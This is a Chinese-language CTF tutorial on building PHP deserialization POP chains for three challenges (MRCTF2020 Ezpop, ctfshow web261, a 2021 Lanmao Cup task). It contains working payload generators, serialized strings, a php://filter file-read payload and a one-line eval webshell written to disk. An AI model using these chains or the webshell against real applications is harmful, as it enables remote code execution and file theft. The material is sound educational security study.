|
原文链接:经验分享 | PHP-反序列化(超细的
例2:[MRCTF2020]Ezpop
- <?php
- class Modifier {
- protected $var;
- public function append($value){
- include($value);
- }
- public function __invoke(){
- $this->append($this->var);
- }
- }
- class Show{
- public $source;
- public $str;
- public function __construct($file='index.php'){
- $this->source = $file;
- echo 'Welcome to '.$this->source."<br>";
- }
- public function __toString(){
- return $this->str->source;
- }
- public function __wakeup(){
- if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
- echo "hacker";
- $this->source = "index.php";
- }
- }
- }
- class Test{
- public $p;
- public function __construct(){
- $this->p = array();
- }
- public function __get($key){
- $function = $this->p;
- return $function();
- }
- }
- if(isset($_GET['pop'])){
- @unserialize($_GET['pop']);
- }
- else{
- $a=new Show;
- highlight_file(__FILE__);
- }
复制代码
首先看看所涉及到的魔术方法:
__construct() 当一个对象创建时被调用
__toString() 当一个对象被当作一个字符串使用
__wakeup() 将在反序列化之后立即被调用
__get() 访问不存在的成员变量时调用的
__invoke() 将对象当作函数来使用时执行此方法
我们可以先一个一个类看看怎么利用
Modifier类:
- <?php
- highlight_file(__FILE__);
- class Modifier {
- protected $var = 'info.php';
- public function append($value){
- include($value);
- }
- public function __invoke(){
- echo '__invoke'."<br>";
- $this->append($this->var);
- }
- }
- $a = new Modifier();
- $a();
复制代码
这里假设需要 include 的文件是info.php
简单解释一下代码的意思,就是我们需要执行append方法,若需要执行该方法可通过__invoke方法执行,也就是当将对象当作函数来使用时执行__invoke方法
所以我们就可以先创建这个对象然后再拿来当函数使用,就会自动触发__invoke方法,从而就可以执行append方法包含info.php文件
运行结果:
接下来是Test类:
- class Test{
- public $p;
- public function __construct(){
- $this->p = array();
- }
- public function __get($key){
- $function = $this->p;
- return $function();
- }
- }
复制代码
首先是__construct方法初始化设置p是一个数组,这显然不是我们需要的,但我们可以重新初始化,然后是__get方法,访问不存在的成员变量时调用,而且返回的是方法,这不就可以配合第一个Modifier类使用了吗,使用Test类的__get方法调用Modifier类,所以我们可以使Test类初始化将$p的值设为Modifier对象,然后再经过__get方法以函数的方式执行Modifier对象(即访问一个Test类不存在的属性),这样就可以使用Modifier对象的append方法了,如下:
- <?php
- class Modifier {
- protected $var = 'info.php';
- public function append($value){
- include($value);
- }
- public function __invoke(){
- echo '__invoke'."<br>";
- $this->append($this->var);
- }
- }
- class Test{
- public $p;
- public function __construct(){
- $this->p = new Modifier();
- }
- public function __get($key){
- $function = $this->p;
- return $function();
- }
- }
- $a = new Test();
- $a->no;
- ?>
复制代码
运行结果:
最后是这个Show类:
- class Show{
- public $source;
- public $str;
- public function __construct($file='index.php'){
- $this->source = $file;
- echo 'Welcome to '.$this->source."<br>";
- }
- public function __toString(){
- return $this->str->source;
- }
- public function __wakeup(){
- if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
- echo "hacker";
- $this->source = "index.php";
- }
- }
- }
复制代码
首先使用unserialize会先触发__wakeup方法,这个方法在这里其实就是充当过滤字符,接着是初始化方法,这个方法有个关键的地方就是使用了echo打印字符串,并且将source拼接起来打印,而__toString() 就是当一个对象被当作一个字符串时调用,正好可以利用初始化方法的echo去完成调用。分析了这么多,最后就可以构造最终的pop链了,先上payload再继续讲
- <?php
- class Modifier {
- protected $var = 'info.php';
- }
- class Show{
- public $source;
- public $str;
- public function __construct($file){
- $this->source = $file;
- echo 'Welcome to '.$this->source."<br>";
- }
- public function __toString(){
- return "566";
- }
- }
- class Test{
- public $p;
- public function __construct(){
- $this->p = new Modifier();
- }
- }
- $a = new Show('spaceman');
- $a->str = new Test();
- $c = new Show($a);
- echo serialize($c);
复制代码
运行结果有不可显示字符%00这里我手动加上了,所以可以使用urlencode一下,我这里是为了更直观的查看所以直接序列化
- Welcome to spaceman
- Welcome to 566
- O:4:"Show":2:{s:6:"source";O:4:"Show":2:{s:6:"source";s:8:"spaceman";s:3:"str";O:4:"Test":1:{s:1:"p";O:8:"Modifier":1:{s:6:"%00*%00var";s:8:"info.php";}}}s:3:"str";N;}
- $a = new Show('spaceman');
复制代码
首先是new一个Show对象,然后初始化source的值,如spaceman等字符,这个没多大影响,只是为了调用Test类中的__get方法,那如何调用的呢$a->str = new Test();
将Show类的str属性设为new Test()
$c = new Show($a);
然后再用Show类初始化刚刚构造的Show类,这里可能就有点绕了,为何我们需要这样构造呢,因为我们需要触发Show的__toString()方法,让str能调用source,而经过刚刚的赋值,str为new Test(),source为new Show('spaceman')中的 spaceman ,那么__toString方法中的str->source就是访问Test类中的spaceman属性,然而Test类没有spaceman属性,那么就会触发__get方法,而该方法又会触发Modifier类中的__invoke方法,最后就完成了include
所以大概调用的过程是:
Show::__toString()-->Test::__get()-->Modifier::__invoke()执行结果:
当然这是文件包含,那么想要读取文件应该怎么办呢,可以php伪协议使用,所以可以这样构造读取文件
- <?php
- class Modifier {
- protected $var = 'php://filter/read=convert.base64-encode/resource=flag.php';
- }
- class Show{
- public $source;
- public $str;
- public function __construct($file){
- $this->source = $file;
- echo 'Welcome to '.$this->source."<br>";
- }
- public function __toString(){
- return "566";
- }
- }
- class Test{
- public $p;
- public function __construct(){
- $this->p = new Modifier();
- }
- }
- $a = new Show('spaceman');
- $a->str = new Test();
- $c = new Show($a);
- echo serialize($c);
- //O:4:"Show":2:{s:6:"source";O:4:"Show":2:{s:6:"source";s:8:"spaceman";s:3:"str";O:4:"Test":1:{s:1:"p";O:8:"Modifier":1:{s:6:"%00*%00var";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}}}s:3:"str";N;}
复制代码
运行结果:
执行:
最后base64解码即可
例3:
ctfshow 反序列化web261
- <?php
- highlight_file(__FILE__);
- class ctfshowvip{
- public $username;
- public $password;
- public $code;
- public function __construct($u,$p){
- $this->username=$u;
- $this->password=$p;
- }
- public function __wakeup(){
- if($this->username!='' || $this->password!=''){
- die('error');
- }
- }
- public function __invoke(){
- eval($this->code);
- }
- public function __sleep(){
- $this->username='';
- $this->password='';
- }
- public function __unserialize($data){
- $this->username=$data['username'];
- $this->password=$data['password'];
- $this->code = $this->username.$this->password;
- }
- public function __destruct(){
- if($this->code==0x36d){
- file_put_contents($this->username, $this->password);
- }
- }
- }
- unserialize($_GET['vip']);
复制代码
首先呢了解一个上文没讲过的__unserialize()方法, 反序列化函数,用于序列化的SET类型数据。如果参数不是序列化的SET,那么会直接返回。如果是一个序列化的SET,但不是PHP-REDIS序列化的格式,函数将抛出一个异常。
Examples:
- $redis->setOpt(Redis::OPT_SERIALIZER, Redis::SERIALIZER_PHP);
- $redis->_unserialize('a:3:{i:0;i:1;i:1;i:2;i:2;i:3;}'); // Will return Array(1,2,3)
复制代码
所以我们此时应该先想怎么序列化__sleep()serialize之前被调用,可以指定要序列化的对象属性。所以在反序列化的时候就没啥用了,我们自己序列化的时候也不加,而__unserialize在序列化的时候也用不到,__wakeup是反序列化恢复对象之前调用的方法,所以跟序列化也没啥关系,__invoke() 是将对象当作函数来使用时执行此方法,但是我发现并不需要调用此方法,因为__destruct()方法中有file_put_contents函数可以写文件,所以我们需要满足 code==0x36d 即可将文件写入,这里不难发现是弱类型比较,所以887.php==0x36d是成立的,所以我们可以直接构造如下:
- <?php
- class ctfshowvip{
- public $username;
- public $password;
- public function __construct($u,$p){
- $this->username=$u;
- $this->password=$p;
- }
- }
- $a = new ctfshowvip('877.php','<?php eval($_POST[1]);?>');
- echo serialize($a);
复制代码
为什么可以直接这样构造而不被__wakeup()拦截呢,因为含有__unserialize(),就是当一个类中同时含有这两个方法时只有__unserialize生效,而__wakeup()失效,如下:- <?php
- highlight_file(__FILE__);
- class ctfshowvip{
- public $username;
- public $password;
- public $code;
- public function __construct($u,$p){
- echo "__construct()<br>";
- $this->username=$u;
- $this->password=$p;
- }
- public function __wakeup(){
- echo "__wakeup()<br>";
- if($this->username!='' || $this->password!=''){
- die('error');
- }
- }
- public function __invoke(){
- echo "__invoke()<br>";
- eval($this->code);
- }
- public function __sleep(){
- echo "__sleep()<br>";
- $this->username='';
- $this->password='';
- }
- public function __unserialize($data){
- echo "__unserialize()<br>";
- $this->username=$data['username'];
- $this->password=$data['password'];
- $this->code = $this->username.$this->password;
- var_dump($data);
- echo "<br>";
- echo $this->code;
- echo "<br>";
- }
- public function __destruct(){
- echo "__destruct()<br>";
- if($this->code==0x36d){
- echo "file_put_contents-----good!<br>";
- }
- }
- }
- unserialize($_GET['vip']);
- 运行结果:
- __unserialize()
- array(2) { ["username"]=> string(7) "877.php" ["password"]=> string(24) "<?php eval($_POST[1]);?>" }
- 877.php
- __destruct()
- file_put_contents-----good!
- 成功写入木马,剩下的操作就不说了
复制代码
例4:
2021蓝帽杯半决赛-杰克与肉丝
源码:
- <?php
- highlight_file(__file__);
- class Jack
- {
- private $action;
- function __set($a, $b)
- {
- $b->$a();
- }
- }
- class Love {
- public $var;
- function __call($a,$b)
- {
- $rose = $this->var;
- call_user_func($rose);
- }
- private function action(){
- echo "jack love rose";
- }
- }
- class Titanic{
- public $people;
- public $ship;
- function __destruct(){
- $this->people->action=$this->ship;
- }
- }
- class Rose{
- public $var1;
- public $var2;
- function __invoke(){
- //if( ($this->var1 != $this->var2) && (md5($this->var1) === md5($this->var2)) && (sha1($this->var1)=== sha1($this->var2)) ){
- eval($this->var1);
- //}
- }
- }
- if(isset($_GET['love'])){
- $sail=$_GET['love'];
- unserialize($sail);
- }
- ?>
复制代码
为了不受其他因素干扰,我先把这个Rose类__invoke函数的if语句注释,就是为了更方便的看看怎么构造的,所以首先我们应该直接寻找我们最后利用的函数eval,然后利用逆推的方式,看看是如何触发该函数的,就是看看怎么调用的,invoke() 将对象当作函数来使用时执行此方法,所以刚刚开始我们依旧可以慢慢一步一步测试分析,慢慢一步一步调用- <?php
- class Rose{
- public $var1 = "phpinfo();";
- public $var2;
- function __invoke(){
- eval($this->var1);
- }
- }
- $a = new Rose();
- echo $a->var1;
- $a();
复制代码
现在是构造出来了,接着是看看怎么才能调用这个类,而Love类有一个是函数以函数的方式,call_user_func 是把第一个参数作为回调函数调用,正好符合了我们需要构造的,所以我们又看一下这个函数是怎么触发的,__call 当调用对象中不存在的方法会自动调用该方法,由于call_user_func回调的参数是$rose,$rose又是直接等于$var,所以我们需要先给$var赋值,这个值就是Rose类,这样call_user_func回调时就拿Rose类当函数执行,这样就可以出发Rose类的eval了
- <?php
- class Love{
- public $var;
- function __call($a,$b)
- {
- $rose = $this->var;
- echo "$a function not find!<br>";
- call_user_func($rose);
- }
- private function action(){
- echo "jack love rose";
- }
- }
- class Rose{
- public $var1 = "phpinfo();";
- public $var2;
- function __invoke(){
- echo $this->var1;
- eval($this->var1);
- }
- }
- $a = new Rose();
- $b = new Love();
- $b->var = $a;
- $b->spaceman(566); //不存在的spaceman函数
复制代码
然后我们继续寻找一下如何在别的类里找一个不存在的函数,$b->spaceman(566) 这样的形式Jack类就有,正好又可以构造了,然后我们再看一下怎么触发Jack类中的这个形式,__set 设置对象不存在的属性或无法访问(私有)的属性时调用,这里的$action是私有的,所以我们可以利用这个action
- <?php
- class Jack{
- private $action;
- function __set($a, $b)
- {
- echo "good! I run!<br>";
- $b->$a();
- }
- }
- class Love{
- public $var;
- function __call($a,$b)
- {
- $rose = $this->var;
- echo "$a function not find!<br>";
- call_user_func($rose);
- }
- private function action(){
- echo "jack love rose";
- }
- }
- class Rose{
- public $var1 = "phpinfo();";
- public $var2;
- function __invoke(){
- echo $this->var1;
- eval($this->var1);
- }
- }
- $a = new Rose();
- $b = new Love();
- $b->var = $a;
- $c = new Jack();
- $c->action = $b;
复制代码
其实这里不用action其实也是可以的,随便一个名字都行,但是这里用action是因为等下需要,因为我们需要利用这个action,那么就是接下来怎么触发这个Jack类了,源码中只有一个unserialize,而要想触发这一系列的类,只有Titanic类符合开始的条件,因为只有Titanic类的__destruct魔法函数触发,所以这就是我们序列化的入口,__destruct当对象所在函数调用完毕后执行。最后就是用Titanic类将这些类都连接在一起- <?php
- class Titanic{
- public $people;
- public $ship;
- function __destruct(){
- $this->people->action=$this->ship;
- }
- }
- class Jack{
- private $action;
- function __set($a, $b)
- {
- echo "good! I run!<br>";
- $b->$a();
- }
- }
- class Love{
- public $var;
- function __call($a,$b)
- {
- $rose = $this->var;
- echo "$a function not find!<br>";
- call_user_func($rose);
- }
- private function action(){
- echo "jack love rose";
- }
- }
- class Rose{
- public $var1 = "phpinfo();";
- public $var2;
- function __invoke(){
- echo $this->var1;
- eval($this->var1);
- }
- }
- $s = new Titanic();
- $s->people = new Jack();
- $s->ship = new Love();
- $s->ship->var = new Rose();
- echo urlencode(serialize($s));
- echo "<br>";
复制代码
最后将序列化后得到的数据输入源码中即可
结束语哈哈哈,下次一定好好更新,下次一定
本次主要是讲了php反序列中常用魔术方法怎么触发以及怎么构造pop链,在实战中有的漏洞就是通过源码审计反序列化来导致RCE的,比如thinkphp5.1.*就存在一个RCE的pop链,这个我之后也会进行更新,构造pop链就是需要耐心也细心,一开始都不容易,我个人使用的是逆推的方法,就是从最后的命令执行往前推,需要啥就找啥,有的师傅是习惯从头到尾,我比较菜,只能从后面慢慢测试慢慢往前推,最后感谢关注我的朋友们,我会更加努力学习,尽量帮师傅们更快掌握一些知识,以后会尽量更新文章,谢谢师傅们!
|
|